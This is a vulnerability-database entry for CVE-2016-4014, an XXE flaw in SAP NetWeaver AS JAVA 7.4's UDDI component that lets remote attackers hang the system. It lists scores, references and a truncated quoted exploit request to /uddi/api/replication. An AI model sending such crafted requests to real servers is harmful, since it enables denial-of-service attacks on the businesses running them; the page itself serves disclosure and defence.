Published: 14/04/2016 Updated: 10/12/2018

CVSS v2 Base Score: 9 | Impact Score: 8.5 | Exploitability Score: 10

CVSS v3 Base Score: 8.6 | Impact Score: 4.7 | Exploitability Score: 3.9

VMScore: 801

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C

XML external entity (XXE) vulnerability in the UDDI component in SAP NetWeaver JAVA AS 7.4 allows remote malicious users to cause a denial of service (system hang) via a crafted DTD in an XML request to uddi/api/replication, aka SAP Security Note 2254389.

Vulnerable Product	Search on Vulmon	Subscribe to Product
sap netweaver 7.4

An attacker can trigger an XML Entity Expansion or XML External Entity Injection This causes the entire machine to become unresponsive until the process is terminated manually An attacker can use this flaw to perform a denial-of-service (DoS) attack SAP NetWeaver AS JAVA version 74 is affected ...

[CVE-2016-4014] SAP Netweaver AS JAVA UDDI Component XML External Entity (XXE)

[CVE-2016-4014] SAP Netweaver JAVA AS UDDI Component XXE POST /uddi/api/replication HTTP/11 Host: host Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/50 (Macintosh; Intel Mac OS X 1015; rv:780) Gecko/20100101 Firefox/780 Content-Type: text/xml;charset=UTF-8 SOAPAction: Content-Length: 340 <?xml version="10" encoding=&qu

NVD-CWE-Other http://seclists.org/fulldisclosure/2016/Jul/45 http://packetstormsecurity.com/files/137919/SAP-NetWeaver-AS-JAVA-7.4-XXE-Injection.html https://erpscan.io/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/https://erpscan.io/advisories/erpscan-16-020-sap-netweaver-java-uddi-component-xxe-vulnerability/https://nvd.nist.gov https://github.com/murataydemir/CVE-2016-4014 https://packetstormsecurity.com/files/137919/SAP-NetWeaver-AS-JAVA-7.4-XXE-Injection.html

CVE-2016-4014

Vulnerability Summary

Exploits

Github Repositories

References

Vulmon Search

About

Products

Connect